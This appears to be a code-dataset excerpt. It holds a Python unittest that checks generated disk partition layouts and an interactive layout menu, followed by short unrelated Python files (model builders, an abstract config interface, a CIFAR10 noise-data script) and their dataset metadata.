'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'3-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'3-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'3-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'3-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'11-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'2-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'2-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'2-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'2-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}}}
# Template metadata for one simulated rotational disk (~10 GB virtual disk).
# NOTE(review): these are shared class-level template dicts; get_disk_config
# assigns them per device -- confirm no caller mutates individual entries.
hdd_defaults = {'boot_device': False, 'model': 'Virtual_disk', 'size': 10000000000.0, 'software_raid': False,
'type': 'disk'}
# Template metadata for one simulated ssd (~2 GB virtual disk).
ssd_defaults = {'boot_device': False, 'model': 'Virtual_disk', 'size': 2000000000.0, 'software_raid': False,
'type': 'ssd'}
# Device names handed out, in order, to the simulated hdds and ssds.
sata_map = ['sda', 'sdb', 'sdc', 'sdd', 'sde', 'sdf', 'sdg', 'sdh', 'sdi', 'sdj', 'sdk', 'sdl', 'sdm']
ssd_map = ['sdn', 'sdo', 'sdp', 'sdq', 'sdr', 'sds', 'sdt', 'sdu', 'sdv', 'sdw', 'sdx', 'sdy', 'sdz']
# When True, the tests print proposed layouts, matrices and diffs while running.
DEBUG = False
@classmethod
def setUpClass(cls):
    """
    One-time preparation for the whole test case.

    Builds the SSH client and the SetupController that the individual
    tests share through module-level globals, so the (mocked) third-party
    libraries do not have to be installed to run the suite.
    """
    global client, sc
    client = SSHClient.load('127.0.0.1', 'rooter')
    sc = SetupController()
@classmethod
def setUp(cls):
    """
    Per-test reset hook.

    Nothing needs resetting between these tests, so this is a no-op.
    """
    pass
@classmethod
def tearDownClass(cls):
    """
    One-time cleanup after the whole test case.

    No resources are held beyond the globals, so this is a no-op.
    """
    pass
@staticmethod
def get_disk_config(hdds, ssds):
    """
    Build a fake disk configuration with the requested number of disks.

    :param hdds: number of rotational disks, mapped onto sata_map (sda..)
    :param ssds: number of ssds, mapped onto ssd_map (sdn..)
    :return: dict mapping device name -> metadata dict for that device
    """
    disk_config = dict()
    for hdd in xrange(0, hdds):
        # Copy the class-level template: assigning the shared dict itself
        # would alias every hdd entry to one object, so mutating one
        # device's metadata would silently change all of them.
        disk_config[PartitionLayout.sata_map[hdd]] = dict(PartitionLayout.hdd_defaults)
    for ssd in xrange(0, ssds):
        disk_config[PartitionLayout.ssd_map[ssd]] = dict(PartitionLayout.ssd_defaults)
    return disk_config
@staticmethod
def show_layout(proposed, disks):
    """
    Pretty-print a proposed partition layout, one line per mountpoint.

    :param proposed: dict mountpoint -> {'device': ..., 'label': ...,
                     'percentage': ...}; a falsy or 'DIR_ONLY' device
                     marks a directory-only mountpoint
    :param disks: dict device-name -> metadata containing at least 'size'
                  (bytes), used to annotate devices with their size in GB
    """
    # Map '/dev/<name>' -> size in bytes for the GB annotation below.
    device_size_map = dict()
    for key, values in disks.iteritems():
        device_size_map['/dev/' + key] = values['size']
    keys = proposed.keys()
    keys.sort()
    # NOTE(review): key_map is filled but never returned or read --
    # looks vestigial; confirm before removing.
    key_map = list()
    for mp in keys:
        sub_keys = proposed[mp].keys()
        sub_keys.sort()
        mp_values = ''
        # Directory-only mountpoints get a single fixed column and skip
        # the per-attribute formatting entirely.
        if not proposed[mp]['device'] or proposed[mp]['device'] in ['DIR_ONLY']:
            mp_values = ' {0} : {1:20}'.format('device', 'DIR_ONLY')
            print "{0:20} : {1}".format(mp, mp_values)
            key_map.append(mp)
            continue
        for sub_key in sub_keys:
            value = str(proposed[mp][sub_key])
            if sub_key == 'device' and value and value != 'DIR_ONLY':
                # Annotate real devices with their size in (decimal) GB.
                size = device_size_map[value]
                size_in_gb = int(size / 1000.0 / 1000.0 / 1000.0)
                value = value + ' ({0} GB)'.format(size_in_gb)
            # Column widths differ per attribute to keep the table aligned.
            if sub_key in ['device']:
                mp_values = mp_values + ' {0} : {1:20}'.format(sub_key, value)
            elif sub_key in ['label']:
                mp_values = mp_values + ' {0} : {1:10}'.format(sub_key, value)
            else:
                mp_values = mp_values + ' {0} : {1:5}'.format(sub_key, value)
        print "{0:20} : {1}".format(mp, mp_values)
        key_map.append(mp)
def validate(self, layout, nr_of_hdds, nr_of_ssds):
    """
    Check one generated layout against the expected entry in full_map.

    :param layout: string holding a one-entry dict literal built by
                   test_partition_layout_generation; evaluated with eval()
    :param nr_of_hdds: hdd count, first half of the full_map key
    :param nr_of_ssds: ssd count, second half of the full_map key
    :return: True when the generated layout matches the expectation,
             False otherwise (with diagnostics when DEBUG is set)
    """
    # key = nr_of_hdds + '-' + nr_of_ssds
    # value = (True|False, percentage)
    key = str(nr_of_hdds) + '-' + str(nr_of_ssds)
    # NOTE(review): the layout string is produced by this suite itself, so
    # eval() is safe here; it would be unsafe on any external input.
    actual_layout = eval(layout).values()[0]
    expected_layout = self.full_map[key]
    # NOTE(review): this relies on assert_equal returning a falsy value
    # (None) on success, so `not assert_equal(...)` means "layouts match".
    # Confirm against the assertion helper imported at the top of the file.
    if not assert_equal(actual_layout, expected_layout):
        return True
    else:
        if self.DEBUG:
            print 'Actual layout: {0}'.format(actual_layout)
            print 'Expected layout: {0}'.format(expected_layout)
            print diff(actual_layout, expected_layout)
        return False
def test_partition_layout_generation(self):
    """
    Generate default partition layouts for every hdd/ssd combination in
    0..2 x 0..2 and validate each one against the expected full_map entry.
    The test only fails at the end, so every failing combination is
    exercised (and printable) in a single run.
    """
    full_matrix = dict()
    valid = True
    for nr_of_hdds in xrange(0, 3):
        for nr_of_ssds in xrange(0, 3):
            disk_config = self.get_disk_config(nr_of_hdds, nr_of_ssds)
            layout, skipped = sc._generate_default_partition_layout(disk_config)
            if self.DEBUG:
                print "Disk config: {0} hdd(s) - {1} ssd(s)".format(nr_of_hdds, nr_of_ssds)
                print "Proposed disk layout"
                self.show_layout(layout, disk_config)
                print layout
            # Serialise the proposed layout into a dict-literal string of the
            # shape {'<hdds>-<ssds>': {mountpoint: {'DIR_ONLY':..,'sip':..}}}
            # so validate() can eval() it and compare against full_map.
            matrix = '{' + "'{0}-{1}':".format(nr_of_hdds, nr_of_ssds) + '{'
            keys = layout.keys()
            keys.sort()
            print
            for key in keys:
                matrix += "'{0}':".format(key) + '{'
                dir_only = layout[key]['device'] == 'DIR_ONLY'
                # Directory-only mountpoints have no meaningful percentage.
                matrix += "'DIR_ONLY':{0},'sip':'{1}',".format(dir_only,
                                                              layout[key]['percentage'] if not dir_only else 'NA')
                matrix += "},"
            matrix += "},}"
            if self.DEBUG:
                full_matrix.update(eval(matrix))
            if not self.validate(matrix, nr_of_hdds, nr_of_ssds):
                valid = False
    if self.DEBUG:
        print full_matrix
    self.assertTrue(valid, 'At least one generated config failed!')
def test_interactive_menu(self):
    """
    Drive the interactive disk-layout menu of an 'ovs' shell via pexpect.

    Starts an ovs python shell, feeds it a known disk layout, then walks
    the menu options: add a mountpoint, update it (device, label,
    percentage and mountpoint), print the table, remove it again and
    quit -- asserting after each step that the printed partition-layout
    table contains exactly the expected lines.
    """
    # Use a known config - and process expected menu structure
    def get_formated_lines(dl):
        # One regex per mountpoint matching its full table row
        # (device, label and percentage in order).
        fl = {}
        for k, v in dl.items():
            fl[k] = r"{0}\s*:\s*device\s*:\s*{1}.*label\s*:\s*{2}\s*percentage\s*:\s*{3}".format(k, v['device'], v['label'], v['percentage'])
        return fl
    def check_partition_layout_table(formated_lines):
        # Expect each pattern once; reads `child` from the enclosing
        # scope (bound below, before the first call).
        idxs = []
        for _ in range(len(formated_lines)):
            idxs.append(child.expect(formated_lines))
        # All indices distinct <=> every expected row appeared.
        assert len(set(idxs)) == len(formated_lines), "Proposed partition layout did not contain all expected lines."
    def pick_option(child, opt_name, fail_if_not_found = True):
        # Find the menu line containing opt_name and send its number
        # (the text before the ':'). Returns whether it was found.
        opt = [l for l in child.buffer.splitlines() if opt_name in l]
        assert opt or not fail_if_not_found, "Option {0} not found\n{1}".format(opt_name, child.before)
        if opt:
            opt = opt[0].split(":")[0].strip()
            child.sendline(opt)
        return bool(opt)
    # (layout dict, set of devices expected to be skipped)
    disk_layout = ({'/mnt/bfs': {'device': '/dev/sdd', 'label': 'backendfs', 'percentage': 80},
                    '/mnt/cache1': {'device': '/dev/sdb', 'label': 'cache1', 'percentage': 50},
                    '/mnt/db': {'device': '/dev/sdb', 'label': 'db', 'percentage': 25},
                    '/mnt/md': {'device': '/dev/sdb', 'label': 'mdpath', 'percentage': 25},
                    '/var/tmp': {'device': '/dev/sdd', 'label': 'tempfs', 'percentage': 21}},
                   set(['sda', 'sdc']))
    child = pexpect.spawn("ovs")
    child.timeout = 300
    child.logfile = sys.stdout
    # ':' matches the interactive python prompt of the ovs shell.
    child.expect(":")
    child.sendline("from ovs.lib.setup import SetupController")
    child.sendline("from ovs.extensions.generic.sshclient import SSHClient")
    child.expect(":")
    child.sendline("client = SSHClient.load('127.0.0.1', 'rooter')")
    child.expect(":")
    child.sendline("sc = SetupController()")
    child.expect(":")
    child.sendline("disk_layout = " + str(disk_layout))
    child.expect(":")
    child.sendline("sc.apply_flexible_disk_layout(client, False, disk_layout[0])")
    child.expect("Proposed partition layout:")
    formated_lines = get_formated_lines(disk_layout[0])
    check_partition_layout_table(formated_lines.values())
    child.expect("Enter number or name; return for next page")
    #0: Add
    child.sendline("0")
    new_mountpoint = {'/mnt/cache2': {'device' : '/dev/sdc',
                                      'label' : 'cache2',
                                      'percentage' : '50'}}
    child.expect("Enter mountpoint to add")
    child.sendline(new_mountpoint.keys()[0])
    # A freshly added mountpoint starts as DIR_ONLY until it is updated.
    check_partition_layout_table(formated_lines.values() + [new_mountpoint.keys()[0] + r"\s*:\s*device\s*:\s*DIR_ONLY"])
    #2: Update
    child.expect("Enter number or name; return for next page")
    child.sendline("2")
    child.expect("Choose mountpoint to update:")
    pick_option(child, new_mountpoint.keys()[0])
    update_dict = new_mountpoint[new_mountpoint.keys()[0]].copy()
    update_dict.update({'mountpoint':'/mnt/cache3'})
    child.expect("Make a choice")
    for opt in ["device", "label", "percentage", "mountpoint"]:
        child.expect("Make a choice")
        pick_option(child, opt)
        child.sendline(update_dict[opt])
    pick_option(child, "finish")
    # Mirror the update in the local expectation before re-checking.
    disk_layout[0][update_dict['mountpoint']] = new_mountpoint[new_mountpoint.keys()[0]].copy()
    formated_lines = get_formated_lines(disk_layout[0])
    check_partition_layout_table(formated_lines.values())
    #3 Print
    child.expect("Enter number or name; return for next page")
    child.sendline("3")
    check_partition_layout_table(formated_lines.values())
    #1 Remove
    child.expect("Enter number or name; return for next page")
    child.sendline("1")
    child.expect("Enter mountpoint to remove")
    child.sendline(update_dict['mountpoint'])
    del disk_layout[0][update_dict['mountpoint']]
    formated_lines = get_formated_lines(disk_layout[0])
    check_partition_layout_table(formated_lines.values())
    #5 Quit
    child.expect("Enter number or name; return for next page")
    child.sendline("5")
    child.expect(":")
    child.kill(9)
if __name__ == '__main__':
    # Run only the PartitionLayout test case when executed directly.
    loader = unittest.TestLoader()
    runner = unittest.TextTestRunner()
    runner.run(loader.loadTestsFromTestCase(PartitionLayout))
| 93.848988
| 145
| 0.473935
| 16,259
| 129,887
| 3.644997
| 0.021158
| 0.245798
| 0.405373
| 0.426482
| 0.923799
| 0.919445
| 0.912594
| 0.908309
| 0.905018
| 0.905018
| 0
| 0.074233
| 0.234173
| 129,887
| 1,383
| 146
| 93.916847
| 0.521559
| 0.005474
| 0
| 0.723869
| 0
| 0.00078
| 0.396445
| 0.001693
| 0.00078
| 0
| 0
| 0
| 0.0039
| 0
| null | null | 0.00156
| 0.00702
| null | null | 0.0078
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
2eaa8d4b7278fb0a1496c57827f467269ae8bf7a
| 162
|
py
|
Python
|
slap_dj/_attr/__init__.py
|
KooCook/slap
|
dfd5ae095980920c12ba1451926aa5b819997a47
|
[
"BSD-3-Clause"
] | null | null | null |
slap_dj/_attr/__init__.py
|
KooCook/slap
|
dfd5ae095980920c12ba1451926aa5b819997a47
|
[
"BSD-3-Clause"
] | null | null | null |
slap_dj/_attr/__init__.py
|
KooCook/slap
|
dfd5ae095980920c12ba1451926aa5b819997a47
|
[
"BSD-3-Clause"
] | 1
|
2021-06-22T05:04:12.000Z
|
2021-06-22T05:04:12.000Z
|
# attrs version 20.0.0 cannot be star-imported
# from attr import *
from _attr import validators as v
from _attr import converters as c
from _attr import write_attrs_models
| 27
| 36
| 0.802469
| 28
| 162
| 4.464286
| 0.571429
| 0.256
| 0.448
| 0.32
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02963
| 0.166667
| 162
| 5
| 37
| 32.4
| 0.896296
| 0.320988
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2eac10b423491145db58fb0e686dbd985f445c16
| 107
|
py
|
Python
|
torchcv/models/fpnssd/__init__.py
|
CVHj/torchcv
|
6291f3e1e4bbf6467fd6b1e79001d34a59481bb6
|
[
"MIT"
] | 433
|
2017-11-30T15:46:58.000Z
|
2022-01-16T08:06:11.000Z
|
torchcv/models/fpnssd/__init__.py
|
CVHj/torchcv
|
6291f3e1e4bbf6467fd6b1e79001d34a59481bb6
|
[
"MIT"
] | 51
|
2018-01-29T15:14:33.000Z
|
2021-08-23T12:02:18.000Z
|
fpn-hoi/torchcv/models/fpnssd/__init__.py
|
TheFairBear/Box-Attention-SSD-HOI
|
6101e209a709899c5645342784c8f451028ff46e
|
[
"MIT"
] | 92
|
2018-01-20T07:45:36.000Z
|
2021-05-28T10:43:53.000Z
|
from torchcv.models.fpnssd.net import FPNSSD512
from torchcv.models.fpnssd.box_coder import FPNSSDBoxCoder
| 35.666667
| 58
| 0.869159
| 15
| 107
| 6.133333
| 0.666667
| 0.23913
| 0.369565
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.074766
| 107
| 2
| 59
| 53.5
| 0.89899
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2efa25c278f4857de533b1e6298ee75f4889da43
| 149
|
py
|
Python
|
seg/model/__init__.py
|
Shuo625/mr-image-segment
|
bcea675525dc436fa5a0dc8f3ce370ac1b614c2d
|
[
"MIT"
] | null | null | null |
seg/model/__init__.py
|
Shuo625/mr-image-segment
|
bcea675525dc436fa5a0dc8f3ce370ac1b614c2d
|
[
"MIT"
] | null | null | null |
seg/model/__init__.py
|
Shuo625/mr-image-segment
|
bcea675525dc436fa5a0dc8f3ce370ac1b614c2d
|
[
"MIT"
] | null | null | null |
from .unet import UNet
from .transunet import TransUNet
def build_model_helper(model_name, model_cfg):
    """
    Instantiate a segmentation model by name.

    :param model_name: model class name, e.g. 'UNet' or 'TransUNet'
    :param model_cfg: configuration object forwarded to the constructor
    :return: the constructed model instance
    :raises ValueError: if model_name is not a known model
    """
    # Explicit registry instead of eval(f'{model_name}(model_cfg)'):
    # evaluating a caller-supplied string is an arbitrary-code-execution
    # hazard and turns a simple typo into an obscure runtime error.
    registry = {'UNet': UNet, 'TransUNet': TransUNet}
    try:
        model_cls = registry[model_name]
    except KeyError:
        raise ValueError('Unknown model name: {0}'.format(model_name))
    return model_cls(model_cfg)
| 21.285714
| 46
| 0.778523
| 23
| 149
| 4.782609
| 0.565217
| 0.163636
| 0.254545
| 0.309091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127517
| 149
| 6
| 47
| 24.833333
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0.154362
| 0.154362
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
2c031557f8ea1cd8b2c941b8fd611c637943df04
| 3,177
|
py
|
Python
|
app/configuration/iconfiguration_handler.py
|
abotkit/charlotte
|
eda388f01d196d2579d9350c19d125ff343b77cb
|
[
"MIT"
] | null | null | null |
app/configuration/iconfiguration_handler.py
|
abotkit/charlotte
|
eda388f01d196d2579d9350c19d125ff343b77cb
|
[
"MIT"
] | null | null | null |
app/configuration/iconfiguration_handler.py
|
abotkit/charlotte
|
eda388f01d196d2579d9350c19d125ff343b77cb
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
class IConfigHandler(ABC):
    """
    Abstract configuration interface for the charlotte bot service.

    Concrete subclasses must provide every value below; each method here is
    abstract and raises NotImplementedError until overridden. The accessors
    cover server identity, Rasa server/action-server settings (ports, urls,
    debug levels, file keys), MinIO object storage, Redis, local storage
    paths and GitHub-backed storage, plus the use_* feature toggles.
    """

    @abstractmethod
    def get_server_identifier(self):
        raise NotImplementedError

    @abstractmethod
    def force_redis_setting_data(self):
        raise NotImplementedError

    @abstractmethod
    def get_minio_model_folder(self):
        raise NotImplementedError

    @abstractmethod
    def get_minio_data_folder(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_server_port(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_action_server_port(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_server_url(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_action_server_url(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_webhook(self):
        raise NotImplementedError

    @abstractmethod
    def get_abotkit_charlotte_port(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_server_debug_level(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_action_server_debug_level(self):
        raise NotImplementedError

    @abstractmethod
    def start_rasa_action_server(self):
        raise NotImplementedError

    @abstractmethod
    def get_minio_config(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_domain_file_key(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_nlu_file_key(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_model_key(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_model_minio_key(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_rules_key(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_stories_key(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_endpoints_file(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_config_file(self):
        raise NotImplementedError

    @abstractmethod
    def get_redis_configuration(self):
        raise NotImplementedError

    @abstractmethod
    def get_redis_model_channel(self):
        raise NotImplementedError

    @abstractmethod
    def get_storage_path(self):
        raise NotImplementedError

    @abstractmethod
    def get_rasa_action_folder(self):
        raise NotImplementedError

    @abstractmethod
    def use_redis(self):
        raise NotImplementedError

    @abstractmethod
    def use_minio(self):
        raise NotImplementedError

    @abstractmethod
    def get_minio_files(self):
        raise NotImplementedError

    @abstractmethod
    def get_bot_name(self):
        raise NotImplementedError

    @abstractmethod
    def get_config_path(self):
        raise NotImplementedError

    @abstractmethod
    def get_github_connection_url(self):
        raise NotImplementedError

    @abstractmethod
    def get_github_repo_storage_path(self):
        raise NotImplementedError

    @abstractmethod
    def use_github(self):
        raise NotImplementedError
| 22.531915
| 49
| 0.717658
| 309
| 3,177
| 7.064725
| 0.158576
| 0.264773
| 0.436097
| 0.634906
| 0.857994
| 0.83738
| 0.701328
| 0.415483
| 0.259734
| 0
| 0
| 0
| 0.238275
| 3,177
| 140
| 50
| 22.692857
| 0.902066
| 0
| 0
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.326923
| false
| 0
| 0.009615
| 0
| 0.346154
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
25cd6f9444d6454b38eac70b1995ae9ab895ed70
| 1,757
|
py
|
Python
|
get_data.py
|
Nilay017/Generative-Deep-Neural-Network-Mixture-Modeling-with-Semi-Supervised-MinMax-EM-Learning
|
705718823f50507f82ee1a657bba33b1c3d6d02b
|
[
"MIT"
] | 1
|
2021-09-05T22:54:59.000Z
|
2021-09-05T22:54:59.000Z
|
get_data.py
|
Nilay017/Generative-Deep-Neural-Network-Mixture-Modeling-with-Semi-Supervised-MinMax-EM-Learning
|
705718823f50507f82ee1a657bba33b1c3d6d02b
|
[
"MIT"
] | null | null | null |
get_data.py
|
Nilay017/Generative-Deep-Neural-Network-Mixture-Modeling-with-Semi-Supervised-MinMax-EM-Learning
|
705718823f50507f82ee1a657bba33b1c3d6d02b
|
[
"MIT"
] | null | null | null |
from data_processing import *
# Generate noisy CIFAR10 subsets for the 5-, 7- and 10-cluster experiments:
# same call sequence as before, expressed as one data-driven loop.
for labels, noise_levels, done_msg in (
        ([0, 1, 2, 3, 4],
         (2.0, 3.0, 4.0),
         "Generating 5 clusters CIFAR10 done!"),
        ([0, 1, 2, 3, 4, 5, 6],
         (0.0, 1.0, 2.0, 3.0, 4.0),
         "Generating 7 clusters CIFAR10 done!"),
        ([0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
         (0.0, 1.0, 2.0, 3.0, 4.0),
         "Generating 10 clusters CIFAR10 done!")):
    for noise in noise_levels:
        # Fresh np.array per call, exactly as the original did, in case the
        # callee mutates its label array.
        create_and_store_CIFARdataset('./', np.array(labels),
                                      32, 1000, noise, '/home/nilay/GANMM-master/data')
    print(done_msg)
| 36.604167
| 78
| 0.634604
| 317
| 1,757
| 3.391167
| 0.100946
| 0.108837
| 0.169302
| 0.314419
| 0.956279
| 0.956279
| 0.956279
| 0.956279
| 0.956279
| 0.956279
| 0
| 0.138691
| 0.121799
| 1,757
| 48
| 79
| 36.604167
| 0.558004
| 0
| 0
| 0.866667
| 0
| 0
| 0.289534
| 0.214448
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.033333
| 0
| 0.033333
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
25df21c52026bb9923082e77ace9ee539336da1f
| 382
|
py
|
Python
|
